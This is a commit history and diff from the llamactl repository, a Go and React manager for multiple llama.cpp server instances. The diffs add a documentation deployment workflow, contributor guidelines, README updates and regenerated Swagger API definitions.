90 Commits

Author SHA1 Message Date
e2f2b721e1 Merge pull request #28 from lordmathis/docs/user-guide
docs: Add mkdocs based user documentation
2025-09-03 23:29:09 +02:00
8c121dd28c Add create instance screenshot and update managing instances documentation 2025-09-03 23:23:55 +02:00
5eada9b6ce Replace main screenshot 2025-09-03 23:09:50 +02:00
ef1a2601fb Update managing-instances.md with new HuggingFace repository and file examples 2025-09-03 23:04:11 +02:00
3013a343f1 Update documentation: remove Web UI guide and adjust navigation links 2025-09-03 22:47:15 +02:00
969b4b14e1 Refactor installation and troubleshooting documentation for clarity and completeness 2025-09-03 21:11:26 +02:00
56756192e3 Fix formatting in configuration.md 2025-09-02 22:05:01 +02:00
131b1b407d Update api-reference 2025-09-02 22:05:01 +02:00
81a6c14bf6 Update api docs 2025-09-02 22:05:01 +02:00
b08f15c5d0 Remove misleading advanced section 2025-09-02 22:05:01 +02:00
92af14b350 Improve index.md 2025-09-02 22:05:01 +02:00
b51974bbf7 Improve getting started section 2025-09-02 22:05:01 +02:00
0b264c8015 Fix typos and consistent naming for Llamactl across documentation 2025-09-02 22:05:01 +02:00
bd31c03f4a Create initial documentation structure 2025-09-02 22:05:01 +02:00
7675271370 Merge pull request #27 from lordmathis/feat/separate-backend-options
feat: Separate backend options from common instance options
2025-09-02 22:03:35 +02:00
d697f83b46 Update GetProxy method to use BackendTypeLlamaCpp constant for backend type 2025-09-02 21:56:38 +02:00
712d28ea42 Remove port marking logic from CreateInstance method 2025-09-02 21:56:25 +02:00
0fd3613798 Refactor backend type from LLAMA_SERVER to LLAMA_CPP across components and tests 2025-09-02 21:19:22 +02:00
4f6bb6292e Implement backend configuration options and refactor related components 2025-09-02 21:12:14 +02:00
d9542ba117 Refactor instance management to support backend types and options 2025-09-01 21:59:18 +02:00
9a4dafeee8 Merge pull request #26 from lordmathis/feat/lru-eviction
feat: Implement least recently used instance eviction
2025-08-31 12:44:06 +02:00
9579930a6a Simplify LRU eviction tests 2025-08-31 11:46:16 +02:00
447f441fd0 Move LRU eviction to timeout.go 2025-08-31 11:42:32 +02:00
27012b6de6 Split manager tests into multiple test files 2025-08-31 11:39:44 +02:00
905e685107 Add LRU eviction tests for instance management 2025-08-31 11:30:57 +02:00
d6d4792a0c Skip eviction for instances without a valid idle timeout 2025-08-31 00:59:26 +02:00
da26f607d4 Update README to enhance resource management details and add configuration options for max running instances and LRU eviction 2025-08-31 00:56:35 +02:00
894f3c3213 Refactor StartInstance method to improve max running instances check 2025-08-31 00:14:29 +02:00
c1fa0faf4b Add LastRequestTime method and LRU eviction logic for instance management 2025-08-30 23:59:37 +02:00
4581d67165 Enhance instance management: improve on-demand start handling and add LRU eviction logic 2025-08-30 23:13:08 +02:00
58cb36bd18 Refactor instance management: replace CanStartInstance with IsMaxRunningInstancesReached method 2025-08-30 23:12:58 +02:00
68253be3e8 Add CanStartInstance method to check instance start conditions 2025-08-30 22:47:15 +02:00
a9f1c1a619 Add LRU eviction configuration for instances 2025-08-30 22:26:02 +02:00
8fdebb069c Merge pull request #25 from lordmathis/fix/stopping-deadlock
fix: Server stopping deadlock
2025-08-30 22:12:07 +02:00
fdd46859b9 Add environment variables for development configuration in launch.json 2025-08-30 22:04:52 +02:00
74495f8163 Refactor Shutdown method to improve instance stopping logic and avoid deadlocks 2025-08-30 22:04:43 +02:00
8ec36dd1b7 Merge pull request #24 from lordmathis/feat/max-running-instances
feat: Implement max running instances constraint and refactor instances status
2025-08-28 20:45:27 +02:00
c4ed745ba9 Fix comparison operators in useInstanceHealth hook 2025-08-28 20:43:41 +02:00
9d548e6dda Remove wrong MaxRunningInstancesError type 2025-08-28 20:42:56 +02:00
41d8c41188 Introduce MaxRunningInstancesError type and handle it in StartInstance handler 2025-08-28 20:07:03 +02:00
7d5c68e671 Add launch configuration for Go server in VSCode 2025-08-28 19:19:55 +02:00
e319731239 Remove unnecessary read locks from GetStatus and IsRunning methods 2025-08-28 19:19:28 +02:00
b698c1d0ea Remove locks from SetStatus 2025-08-28 19:08:20 +02:00
227ca7927a Refactor SetStatus method to capture onStatusChange callback reference before unlocking mutex 2025-08-28 18:59:26 +02:00
0b058237fe Enforce maximum running instances limit in StartInstance method 2025-08-27 21:18:38 +02:00
ae37055331 Add onStatusChange callback to instance management for status updates 2025-08-27 20:54:26 +02:00
a8f3a8e0f5 Refactor instance status handling on the frontend 2025-08-27 20:11:21 +02:00
b41ebdc604 Set instance status to Failed when restart conditions are not met 2025-08-27 19:47:36 +02:00
1443746add Refactor instance status management: replace Running boolean with InstanceStatus enum and update related methods 2025-08-27 19:44:38 +02:00
615c2ac54e Add MaxRunningInstances to InstancesConfig and implement IsRunning method 2025-08-27 18:42:34 +02:00
a6e3cb4a9b Merge pull request #23 from lordmathis/feat/start-on-request
feat: On-Demand Instance Start
2025-08-20 16:04:59 +02:00
9181c3d7bc Remove unused import from zodFormUtils.ts 2025-08-20 16:03:09 +02:00
1939b45312 Refactor WaitForHealthy method to use direct health check URL and simplify health check logic 2025-08-20 15:58:08 +02:00
8265a94bf7 Add on-demand start configuration to instance options and basic fields 2025-08-20 14:56:11 +02:00
4bc9362f7a Add default on-demand start settings and timeout configuration to README 2025-08-20 14:41:42 +02:00
ddb54763f6 Add OnDemandStartTimeout configuration and update OpenAIProxy to use it 2025-08-20 14:25:43 +02:00
496ab3aa5d Update README to clarify on-demand instance start feature 2025-08-20 14:22:55 +02:00
287a5e0817 Implement WaitForHealthy method and enhance OpenAIProxy to support on-demand instance start 2025-08-20 14:19:12 +02:00
7b4adfa0cd Add DefaultOnDemandStart configuration and update instance options 2025-08-20 13:50:43 +02:00
651c8b9b2c Merge pull request #22 from lordmathis/feat/timeout
feat: Implement idle instance timeout
2025-08-20 13:34:38 +02:00
7194e1fdd1 Update README to clarify idle timeout management and state persistence features 2025-08-20 13:32:03 +02:00
492c3ff270 Remove redundant timeout tests and improve test coverage for instance timeout validation 2025-08-20 13:25:56 +02:00
00a3cba717 Enhance shutdown handling in InstanceManager with proper synchronization and max instances check 2025-08-19 22:34:48 +02:00
eb1d4ab55f Enhance timeout functionality tests to validate configuration and logic without starting instances 2025-08-19 20:52:59 +02:00
a9e3801eae Refactor logging in checkAllTimeouts 2025-08-19 19:25:15 +02:00
1aaab96cec Add idle timeout configuration to instance options and basic fields 2025-08-19 19:24:54 +02:00
78eda77e44 Enhance timeout handling in InstanceManager with goroutine recovery and shutdown support 2025-08-17 22:49:28 +02:00
d70bb634cd Implement instance tests for timeout 2025-08-17 21:50:16 +02:00
41eaebc927 Add TimeoutCheckInterval to instance configuration in tests 2025-08-17 21:42:52 +02:00
c45fa13206 Initialize last request time on instance start and update timeout handling logic 2025-08-17 21:15:28 +02:00
5e3a28398d Implement periodic timeout checking for instances 2025-08-17 21:10:48 +02:00
c734bcae4a Move UpdateLastRequestTime method to timeout.go and add ShouldTimeout method for idle timeout handling 2025-08-17 20:37:20 +02:00
e4e7a82294 Implement last request time tracking for instance management 2025-08-17 19:44:57 +02:00
ccffbca6b2 Add timeout check interval and update instance configuration 2025-08-17 19:26:21 +02:00
902be409d5 Add IdleTimeout option to CreateInstanceOptions and update JSON handling 2025-08-17 19:06:09 +02:00
eb9599f26a Merge pull request #21 from lordmathis/feat/dark-mode
feat: Implement dark theme and theme switching
2025-08-11 17:56:16 +02:00
ebf8dfdeab Mock window.matchMedia for dark mode functionality in tests 2025-08-11 17:54:04 +02:00
f15c0840c4 Implement dark theme and theme switching 2025-08-11 17:39:56 +02:00
e702bcb694 Create CNAME 2025-08-08 13:41:58 +02:00
4895fbff15 Merge pull request #20 from lordmathis/docs/contributing
docs: Add CONTRIBUTING.md to outline development setup and contribution process
2025-08-07 21:13:01 +02:00
282fe67355 Add CONTRIBUTING.md to outline development setup and contribution process 2025-08-07 21:10:01 +02:00
96a36e1119 Merge pull request #19 from lordmathis/docs/readme-screenshot
docs: Add dashboard screenshot to README
2025-08-07 19:55:15 +02:00
759fc58326 Update README to include dashboard screenshot 2025-08-07 19:51:34 +02:00
afef3d0180 Update import path for API documentation to use apidocs 2025-08-07 19:48:28 +02:00
a87652937f Move swagger documentation to apidoc 2025-08-07 19:48:03 +02:00
7bde12db47 Merge pull request #18 from lordmathis/feat/show-version
feat: Show app version on backend and frontend
2025-08-07 19:11:58 +02:00
e2b64620b5 Expose version endpoint 2025-08-07 19:10:06 +02:00
3ba62af01a Add VITE_APP_VERSION to environment and update SystemInfoDialog to display version 2025-08-07 19:01:31 +02:00
0150429e82 Add commit hash and build time to version output 2025-08-07 18:48:35 +02:00
2ecf096024 Add version flag to display llamactl version 2025-08-07 18:46:49 +02:00
62 changed files with 4163 additions and 1525 deletions

65
.github/workflows/docs.yml vendored Normal file

@@ -0,0 +1,65 @@
name: Build and Deploy Documentation

on:
  push:
    branches: [ main ]
    paths:
      - 'docs/**'
      - 'mkdocs.yml'
      - 'docs-requirements.txt'
      - '.github/workflows/docs.yml'
  pull_request:
    branches: [ main ]
    paths:
      - 'docs/**'
      - 'mkdocs.yml'
      - 'docs-requirements.txt'

permissions:
  contents: read
  pages: write
  id-token: write

concurrency:
  group: "pages"
  cancel-in-progress: false

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          fetch-depth: 0 # Needed for git-revision-date-localized plugin
      - name: Setup Python
        uses: actions/setup-python@v4
        with:
          python-version: '3.11'
      - name: Install dependencies
        run: |
          pip install -r docs-requirements.txt
      - name: Build documentation
        run: |
          mkdocs build --strict
      - name: Upload documentation artifact
        if: github.ref == 'refs/heads/main'
        uses: actions/upload-pages-artifact@v3
        with:
          path: ./site
  deploy:
    if: github.ref == 'refs/heads/main'
    environment:
      name: github-pages
      url: ${{ steps.deployment.outputs.page_url }}
    runs-on: ubuntu-latest
    needs: build
    steps:
      - name: Deploy to GitHub Pages
        id: deployment
        uses: actions/deploy-pages@v4


@@ -29,6 +29,8 @@ jobs:
          npm ci
      - name: Build Web UI
+       env:
+         VITE_APP_VERSION: ${{ github.ref_name }}
        run: |
          cd webui
          npm run build

19
.vscode/launch.json vendored Normal file

@@ -0,0 +1,19 @@
{
  // Use IntelliSense to learn about possible attributes.
  // Hover to view descriptions of existing attributes.
  // For more information, visit: https://go.microsoft.com/fwlink/?linkid=830387
  "version": "0.2.0",
  "configurations": [
    {
      "name": "Launch Server",
      "type": "go",
      "request": "launch",
      "mode": "auto",
      "program": "${workspaceFolder}/cmd/server/main.go",
      "env": {
        "GO_ENV": "development",
        "LLAMACTL_REQUIRE_MANAGEMENT_AUTH": "false"
      },
    }
  ]
}

1
CNAME Normal file

@@ -0,0 +1 @@
llamactl.org

182
CONTRIBUTING.md Normal file

@@ -0,0 +1,182 @@
# Contributing to Llamactl
Thank you for considering contributing to Llamactl! This document outlines the development setup and contribution process.
## Development Setup
### Prerequisites
- Go 1.24 or later
- Node.js 22 or later
- `llama-server` executable (from [llama.cpp](https://github.com/ggml-org/llama.cpp))
### Getting Started
1. **Clone the repository**
```bash
git clone https://github.com/lordmathis/llamactl.git
cd llamactl
```
2. **Install dependencies**
```bash
# Go dependencies
go mod download
# Frontend dependencies
cd webui && npm ci && cd ..
```
3. **Run for development**
```bash
# Start backend server
go run ./cmd/server
```
Server will be available at `http://localhost:8080`
```bash
# In a separate terminal, start frontend dev server
cd webui && npm run dev
```
Development UI will be available at `http://localhost:5173`
4. **Common development commands**
```bash
# Backend
go test ./... -v # Run tests
go test -race ./... -v # Run with race detector
go fmt ./... && go vet ./... # Format and vet code
# Frontend (run from webui/ directory)
npm run test:run # Run tests once
npm run test # Run tests in watch mode
npm run type-check # TypeScript type checking
npm run lint:fix # Lint and fix issues
```
## Before Submitting a Pull Request
### Required Checks
All the following must pass:
1. **Backend**
```bash
go test ./... -v
go test -race ./... -v
go fmt ./... && go vet ./...
go build -o llamactl ./cmd/server
```
2. **Frontend**
```bash
cd webui
npm run test:run
npm run type-check
npm run build
```
### API Documentation
If changes affect API endpoints, update Swagger documentation:
```bash
# Install swag if needed
go install github.com/swaggo/swag/cmd/swag@latest
# Update Swagger comments in pkg/server/handlers.go
# Then regenerate docs
swag init -g cmd/server/main.go -o apidocs
```
## Pull Request Guidelines
### Pull Request Titles
Use this format for pull request titles:
- `feat:` for new features
- `fix:` for bug fixes
- `docs:` for documentation changes
- `test:` for test additions or modifications
- `refactor:` for code refactoring
### Submission Process
1. Create a feature branch from `main`
2. Make changes following the coding standards
3. Run all required checks listed above
4. Update documentation if necessary
5. Submit pull request with:
- Clear description of changes
- Reference to any related issues
- Screenshots for UI changes
## Code Style and Testing
### Testing Strategy
- Backend tests use Go's built-in testing framework
- Frontend tests use Vitest and React Testing Library
- Run tests frequently during development
- Add tests for new features and bug fixes
### Go
- Follow standard Go formatting (`go fmt`)
- Use meaningful variable and function names
- Add comments for exported functions and types
- Handle errors appropriately
### TypeScript/React
- Use TypeScript strictly (avoid `any` when possible)
- Follow React hooks best practices
- Use meaningful component and variable names
- Prefer functional components over class components
## Documentation Development
This project uses MkDocs for documentation. When working on documentation:
### Setup Documentation Environment
```bash
# Install documentation dependencies
pip install -r docs-requirements.txt
```
### Development Workflow
```bash
# Serve documentation locally for development
mkdocs serve
```
The documentation will be available at http://localhost:8000
```bash
# Build static documentation site
mkdocs build
```
The built site will be in the `site/` directory.
### Documentation Structure
- `docs/` - Documentation content (Markdown files)
- `mkdocs.yml` - MkDocs configuration
- `docs-requirements.txt` - Python dependencies for documentation
### Adding New Documentation
When adding new documentation:
1. Create Markdown files in the appropriate `docs/` subdirectory
2. Update the navigation in `mkdocs.yml`
3. Test locally with `mkdocs serve`
4. Submit a pull request
### Documentation Deployment
Documentation is automatically built and deployed to GitHub Pages when changes are pushed to the main branch.
## Getting Help
- Check existing [issues](https://github.com/lordmathis/llamactl/issues)
- Review the [README.md](README.md) for usage documentation
- Look at existing code for patterns and conventions
Thank you for contributing to Llamactl!

104
README.md

@@ -2,7 +2,7 @@
 ![Build and Release](https://github.com/lordmathis/llamactl/actions/workflows/release.yaml/badge.svg) ![Go Tests](https://github.com/lordmathis/llamactl/actions/workflows/go_test.yaml/badge.svg) ![WebUI Tests](https://github.com/lordmathis/llamactl/actions/workflows/webui_test.yaml/badge.svg)
-**Management server for multiple llama.cpp instances with OpenAI-compatible API routing.**
+**Management server and proxy for multiple llama.cpp instances with OpenAI-compatible API routing.**
 ## Why llamactl?
@@ -11,7 +11,11 @@
 🌐 **Web Dashboard**: Modern React UI for visual management (unlike CLI-only tools)
 🔐 **API Key Authentication**: Separate keys for management vs inference access
 📊 **Instance Monitoring**: Health checks, auto-restart, log management
-**Persistent State**: Instances survive server restarts
+**Smart Resource Management**: Idle timeout, LRU eviction, and configurable instance limits
+💡 **On-Demand Instance Start**: Automatically launch instances upon receiving OpenAI-compatible API requests
+💾 **State Persistence**: Ensure instances remain intact across server restarts
+![Dashboard Screenshot](docs/images/dashboard.png)
 **Choose llamactl if**: You need authentication, health monitoring, auto-restart, and centralized management of multiple llama-server instances
 **Choose Ollama if**: You want the simplest setup with strong community ecosystem and third-party integrations
@@ -109,10 +113,15 @@ instances:
   logs_dir: ~/.local/share/llamactl/logs # Logs directory
   auto_create_dirs: true # Auto-create data/config/logs dirs if missing
   max_instances: -1 # Max instances (-1 = unlimited)
+  max_running_instances: -1 # Max running instances (-1 = unlimited)
+  enable_lru_eviction: true # Enable LRU eviction for idle instances
   llama_executable: llama-server # Path to llama-server executable
   default_auto_restart: true # Auto-restart new instances by default
   default_max_restarts: 3 # Max restarts for new instances
   default_restart_delay: 5 # Restart delay (seconds) for new instances
+  default_on_demand_start: true # Default on-demand start setting
+  on_demand_start_timeout: 120 # Default on-demand start timeout in seconds
+  timeout_check_interval: 5 # Idle instance timeout check in minutes
 auth:
   require_inference_auth: true # Require auth for inference endpoints
@@ -121,96 +130,7 @@ auth:
   management_keys: [] # Keys for management endpoints
 ```
-<details><summary><strong>Full Configuration Guide</strong></summary>
+For detailed configuration options including environment variables, file locations, and advanced settings, see the [Configuration Guide](docs/getting-started/configuration.md).
-llamactl can be configured via configuration files or environment variables. Configuration is loaded in the following order of precedence:
-```
-Defaults < Configuration file < Environment variables
-```
-### Configuration Files
-#### Configuration File Locations
-Configuration files are searched in the following locations (in order of precedence):
-**Linux/macOS:**
-- `./llamactl.yaml` or `./config.yaml` (current directory)
-- `$HOME/.config/llamactl/config.yaml`
-- `/etc/llamactl/config.yaml`
-**Windows:**
-- `./llamactl.yaml` or `./config.yaml` (current directory)
-- `%APPDATA%\llamactl\config.yaml`
-- `%USERPROFILE%\llamactl\config.yaml`
-- `%PROGRAMDATA%\llamactl\config.yaml`
-You can specify the path to config file with `LLAMACTL_CONFIG_PATH` environment variable.
-### Configuration Options
-#### Server Configuration
-```yaml
-server:
-  host: "0.0.0.0" # Server host to bind to (default: "0.0.0.0")
-  port: 8080 # Server port to bind to (default: 8080)
-  allowed_origins: ["*"] # CORS allowed origins (default: ["*"])
-  enable_swagger: false # Enable Swagger UI (default: false)
-```
-**Environment Variables:**
-- `LLAMACTL_HOST` - Server host
-- `LLAMACTL_PORT` - Server port
-- `LLAMACTL_ALLOWED_ORIGINS` - Comma-separated CORS origins
-- `LLAMACTL_ENABLE_SWAGGER` - Enable Swagger UI (true/false)
-#### Instance Configuration
-```yaml
-instances:
-  port_range: [8000, 9000] # Port range for instances (default: [8000, 9000])
-  data_dir: "~/.local/share/llamactl" # Directory for all llamactl data (default varies by OS)
-  configs_dir: "~/.local/share/llamactl/instances" # Directory for instance configs (default: data_dir/instances)
-  logs_dir: "~/.local/share/llamactl/logs" # Directory for instance logs (default: data_dir/logs)
-  auto_create_dirs: true # Automatically create data/config/logs directories (default: true)
-  max_instances: -1 # Maximum instances (-1 = unlimited)
-  llama_executable: "llama-server" # Path to llama-server executable
-  default_auto_restart: true # Default auto-restart setting
-  default_max_restarts: 3 # Default maximum restart attempts
-  default_restart_delay: 5 # Default restart delay in seconds
-```
-**Environment Variables:**
-- `LLAMACTL_INSTANCE_PORT_RANGE` - Port range (format: "8000-9000" or "8000,9000")
-- `LLAMACTL_DATA_DIRECTORY` - Data directory path
-- `LLAMACTL_INSTANCES_DIR` - Instance configs directory path
-- `LLAMACTL_LOGS_DIR` - Log directory path
-- `LLAMACTL_AUTO_CREATE_DATA_DIR` - Auto-create data/config/logs directories (true/false)
-- `LLAMACTL_MAX_INSTANCES` - Maximum number of instances
-- `LLAMACTL_LLAMA_EXECUTABLE` - Path to llama-server executable
-- `LLAMACTL_DEFAULT_AUTO_RESTART` - Default auto-restart setting (true/false)
-- `LLAMACTL_DEFAULT_MAX_RESTARTS` - Default maximum restarts
-- `LLAMACTL_DEFAULT_RESTART_DELAY` - Default restart delay in seconds
-#### Authentication Configuration
-```yaml
-auth:
-  require_inference_auth: true # Require API key for OpenAI endpoints (default: true)
-  inference_keys: [] # List of valid inference API keys
-  require_management_auth: true # Require API key for management endpoints (default: true)
-  management_keys: [] # List of valid management API keys
-```
-**Environment Variables:**
-- `LLAMACTL_REQUIRE_INFERENCE_AUTH` - Require auth for OpenAI endpoints (true/false)
-- `LLAMACTL_INFERENCE_KEYS` - Comma-separated inference API keys
-- `LLAMACTL_REQUIRE_MANAGEMENT_AUTH` - Require auth for management endpoints (true/false)
-- `LLAMACTL_MANAGEMENT_KEYS` - Comma-separated management API keys
-</details>
 ## License


@@ -1,5 +1,5 @@
-// Package docs Code generated by swaggo/swag. DO NOT EDIT
+// Package apidocs Code generated by swaggo/swag. DO NOT EDIT
-package docs
+package apidocs
 import "github.com/swaggo/swag"
@@ -37,7 +37,7 @@ const docTemplate = `{
                "schema": {
                    "type": "array",
                    "items": {
-                       "$ref": "#/definitions/llamactl.Instance"
+                       "$ref": "#/definitions/instance.Process"
                    }
                }
            },
@@ -75,7 +75,7 @@ const docTemplate = `{
            "200": {
                "description": "Instance details",
                "schema": {
-                   "$ref": "#/definitions/llamactl.Instance"
+                   "$ref": "#/definitions/instance.Process"
                }
            },
            "400": {
@@ -120,7 +120,7 @@ const docTemplate = `{
                "in": "body",
                "required": true,
                "schema": {
-                   "$ref": "#/definitions/llamactl.CreateInstanceOptions"
+                   "$ref": "#/definitions/instance.CreateInstanceOptions"
                }
            }
        ],
@@ -128,7 +128,7 @@ const docTemplate = `{
            "200": {
                "description": "Updated instance details",
                "schema": {
-                   "$ref": "#/definitions/llamactl.Instance"
+                   "$ref": "#/definitions/instance.Process"
                }
            },
            "400": {
@@ -173,7 +173,7 @@ const docTemplate = `{
                "in": "body",
                "required": true,
                "schema": {
-                   "$ref": "#/definitions/llamactl.CreateInstanceOptions"
+                   "$ref": "#/definitions/instance.CreateInstanceOptions"
                }
            }
        ],
@@ -181,7 +181,7 @@ const docTemplate = `{
            "201": {
                "description": "Created instance details",
                "schema": {
-                   "$ref": "#/definitions/llamactl.Instance"
+                   "$ref": "#/definitions/instance.Process"
                }
            },
            "400": {
@@ -401,7 +401,7 @@ const docTemplate = `{
            "200": {
                "description": "Restarted instance details",
                "schema": {
-                   "$ref": "#/definitions/llamactl.Instance"
+                   "$ref": "#/definitions/instance.Process"
                }
            },
            "400": {
@@ -444,7 +444,7 @@ const docTemplate = `{
            "200": {
                "description": "Started instance details",
                "schema": {
-                   "$ref": "#/definitions/llamactl.Instance"
+                   "$ref": "#/definitions/instance.Process"
                }
            },
            "400": {
@@ -487,7 +487,7 @@ const docTemplate = `{
            "200": {
                "description": "Stopped instance details",
                "schema": {
-                   "$ref": "#/definitions/llamactl.Instance"
+                   "$ref": "#/definitions/instance.Process"
                }
            },
            "400": {
@@ -639,7 +639,35 @@ const docTemplate = `{
            "200": {
                "description": "List of OpenAI-compatible instances",
                "schema": {
-                   "$ref": "#/definitions/llamactl.OpenAIListInstancesResponse"
+                   "$ref": "#/definitions/server.OpenAIListInstancesResponse"
+               }
+           },
+           "500": {
+               "description": "Internal Server Error",
+               "schema": {
+                   "type": "string"
+               }
+           }
+       }
+   }
+},
+"/version": {
+   "get": {
+       "security": [
+           {
+               "ApiKeyAuth": []
+           }
+       ],
+       "description": "Returns the version of the llamactl command",
+       "tags": [
+           "version"
+       ],
+       "summary": "Get llamactl version",
+       "responses": {
+           "200": {
+               "description": "Version information",
+               "schema": {
+                   "type": "string"
                }
            },
            "500": {
@@ -653,7 +681,7 @@ const docTemplate = `{
        }
    },
    "definitions": {
-       "llamactl.CreateInstanceOptions": {
+       "instance.CreateInstanceOptions": {
            "type": "object",
            "properties": {
                "alias": {
@@ -751,7 +779,6 @@ const docTemplate = `{
                    "type": "string"
                },
                "draft_max": {
-                   "description": "Speculative decoding params",
                    "type": "integer"
                },
                "draft_min": {
@@ -857,6 +884,10 @@ const docTemplate = `{
                "host": {
                    "type": "string"
                },
+               "idle_timeout": {
+                   "description": "Idle timeout",
+                   "type": "integer"
+               },
                "ignore_eos": {
                    "type": "boolean"
                },
@@ -955,7 +986,7 @@ const docTemplate = `{
                    "type": "boolean"
                },
                "no_context_shift": {
-                   "description": "Server/Example-specific params",
+                   "description": "Example-specific params",
                    "type": "boolean"
                },
                "no_escape": {
@@ -991,6 +1022,10 @@
                "numa": {
                    "type": "string"
                },
+               "on_demand_start": {
+                   "description": "On demand start",
+                   "type": "boolean"
+               },
                "override_kv": {
                    "type": "array",
                    "items": {
@@ -1027,10 +1062,10 @@
                "presence_penalty": {
                    "type": "number"
                },
-               "priority": {
+               "prio": {
                    "type": "integer"
                },
-               "priority_batch": {
+               "prio_batch": {
                    "type": "integer"
                },
                "props": {
@@ -1051,8 +1086,7 @@
                "reranking": {
                    "type": "boolean"
                },
-               "restart_delay_seconds": {
-                   "description": "RestartDelay duration in seconds",
+               "restart_delay": {
                    "type": "integer"
                },
                "rope_freq_base": {
@@ -1101,7 +1135,7 @@
                "ssl_key_file": {
                    "type": "string"
                },
-               "temperature": {
+               "temp": {
                    "type": "number"
                },
                "tensor_split": {
@@ -1167,7 +1201,20 @@
                }
            }
        },
-       "llamactl.Instance": {
+       "instance.InstanceStatus": {
+           "type": "integer",
+           "enum": [
+               0,
+               1,
+               2
+           ],
+           "x-enum-varnames": [
+               "Stopped",
+               "Running",
+               "Failed"
+           ]
+       },
+       "instance.Process": {
            "type": "object",
            "properties": {
                "created": {
@@ -1177,13 +1224,17 @@
                "name": {
                    "type": "string"
                },
-               "running": {
+               "status": {
                    "description": "Status",
-                   "type": "boolean"
+                   "allOf": [
+                       {
+                           "$ref": "#/definitions/instance.InstanceStatus"
+                       }
+                   ]
                }
            }
        },
-       "llamactl.OpenAIInstance": {
+       "server.OpenAIInstance": {
            "type": "object",
            "properties": {
                "created": {
@@ -1200,13 +1251,13 @@
                }
            }
        },
-       "llamactl.OpenAIListInstancesResponse": {
+       "server.OpenAIListInstancesResponse": {
            "type": "object",
            "properties": {
                "data": {
                    "type": "array",
                    "items": {
-                       "$ref": "#/definitions/llamactl.OpenAIInstance"
+                       "$ref": "#/definitions/server.OpenAIInstance"
                    }
                },
                "object": {


@@ -30,7 +30,7 @@
                "schema": {
                    "type": "array",
                    "items": {
-                       "$ref": "#/definitions/llamactl.Instance"
+                       "$ref": "#/definitions/instance.Process"
                    }
                }
            },
@@ -68,7 +68,7 @@
            "200": {
                "description": "Instance details",
                "schema": {
-                   "$ref": "#/definitions/llamactl.Instance"
+                   "$ref": "#/definitions/instance.Process"
                }
            },
            "400": {
@@ -113,7 +113,7 @@
                "in": "body",
                "required": true,
                "schema": {
-                   "$ref": "#/definitions/llamactl.CreateInstanceOptions"
+                   "$ref": "#/definitions/instance.CreateInstanceOptions"
                }
            }
        ],
@@ -121,7 +121,7 @@
            "200": {
                "description": "Updated instance details",
                "schema": {
-                   "$ref": "#/definitions/llamactl.Instance"
+                   "$ref": "#/definitions/instance.Process"
                }
            },
            "400": {
@@ -166,7 +166,7 @@
                "in": "body",
                "required": true,
                "schema": {
-                   "$ref": "#/definitions/llamactl.CreateInstanceOptions"
+                   "$ref": "#/definitions/instance.CreateInstanceOptions"
                }
            }
        ],
@@ -174,7 +174,7 @@
            "201": {
                "description": "Created instance details",
                "schema": {
-                   "$ref": "#/definitions/llamactl.Instance"
+                   "$ref": "#/definitions/instance.Process"
                }
            },
            "400": {
@@ -394,7 +394,7 @@
            "200": {
                "description": "Restarted instance details",
                "schema": {
-                   "$ref": "#/definitions/llamactl.Instance"
+                   "$ref": "#/definitions/instance.Process"
                }
            },
            "400": {
@@ -437,7 +437,7 @@
            "200": {
                "description": "Started instance details",
                "schema": {
-                   "$ref": "#/definitions/llamactl.Instance"
+                   "$ref": "#/definitions/instance.Process"
                }
            },
            "400": {
@@ -480,7 +480,7 @@
            "200": {
                "description": "Stopped instance details",
                "schema": {
-                   "$ref": "#/definitions/llamactl.Instance"
+                   "$ref": "#/definitions/instance.Process"
                }
            },
            "400": {
@@ -632,7 +632,35 @@
            "200": {
                "description": "List of OpenAI-compatible instances",
                "schema": {
-                   "$ref": "#/definitions/llamactl.OpenAIListInstancesResponse"
+                   "$ref": "#/definitions/server.OpenAIListInstancesResponse"
+               }
+           },
+           "500": {
+               "description": "Internal Server Error",
+               "schema": {
+                   "type": "string"
+               }
+           }
+       }
+   }
+},
+"/version": {
+   "get": {
+       "security": [
+           {
+               "ApiKeyAuth": []
+           }
+       ],
+       "description": "Returns the version of the llamactl command",
+       "tags": [
+           "version"
+       ],
+       "summary": "Get llamactl version",
+       "responses": {
+           "200": {
+               "description": "Version information",
+               "schema": {
+                   "type": "string"
                }
            },
            "500": {
@@ -646,7 +674,7 @@
        }
    },
    "definitions": {
-       "llamactl.CreateInstanceOptions": {
+       "instance.CreateInstanceOptions": {
            "type": "object",
            "properties": {
                "alias": {
@@ -744,7 +772,6 @@
                    "type": "string"
                },
                "draft_max": {
-                   "description": "Speculative decoding params",
                    "type": "integer"
                },
                "draft_min": {
@@ -850,6 +877,10 @@
                "host": {
                    "type": "string"
                },
+               "idle_timeout": {
+                   "description": "Idle timeout",
+                   "type": "integer"
+               },
                "ignore_eos": {
                    "type": "boolean"
                },
@@ -948,7 +979,7 @@
                    "type": "boolean"
                },
                "no_context_shift": {
-                   "description": "Server/Example-specific params",
+                   "description": "Example-specific params",
                    "type": "boolean"
                },
                "no_escape": {
@@ -984,6 +1015,10 @@
                "numa": {
                    "type": "string"
                },
+               "on_demand_start": {
+                   "description": "On demand start",
+                   "type": "boolean"
+               },
                "override_kv": {
                    "type": "array",
                    "items": {
@@ -1020,10 +1055,10 @@
                "presence_penalty": {
                    "type": "number"
                },
-               "priority": {
+               "prio": {
                    "type": "integer"
                },
-               "priority_batch": {
+               "prio_batch": {
                    "type": "integer"
                },
                "props": {
@@ -1044,8 +1079,7 @@
                "reranking": {
                    "type": "boolean"
                },
-               "restart_delay_seconds": {
-                   "description": "RestartDelay duration in seconds",
+               "restart_delay": {
                    "type": "integer"
                },
                "rope_freq_base": {
@@ -1094,7 +1128,7 @@
                "ssl_key_file": {
                    "type": "string"
                },
-               "temperature": {
+               "temp": {
                    "type": "number"
                },
                "tensor_split": {
@@ -1160,7 +1194,20 @@
                }
            }
        },
-       "llamactl.Instance": {
+       "instance.InstanceStatus": {
+           "type": "integer",
+           "enum": [
+               0,
+               1,
+               2
+           ],
+           "x-enum-varnames": [
+               "Stopped",
+               "Running",
+               "Failed"
+           ]
+       },
+       "instance.Process": {
            "type": "object",
            "properties": {
                "created": {
@@ -1170,13 +1217,17 @@
                "name": {
                    "type": "string"
                },
-               "running": {
+               "status": {
                    "description": "Status",
-                   "type": "boolean"
+                   "allOf": [
+                       {
+                           "$ref": "#/definitions/instance.InstanceStatus"
+                       }
+                   ]
                }
            }
        },
-       "llamactl.OpenAIInstance": {
+       "server.OpenAIInstance": {
            "type": "object",
            "properties": {
                "created": {
@@ -1193,13 +1244,13 @@
                }
            }
        },
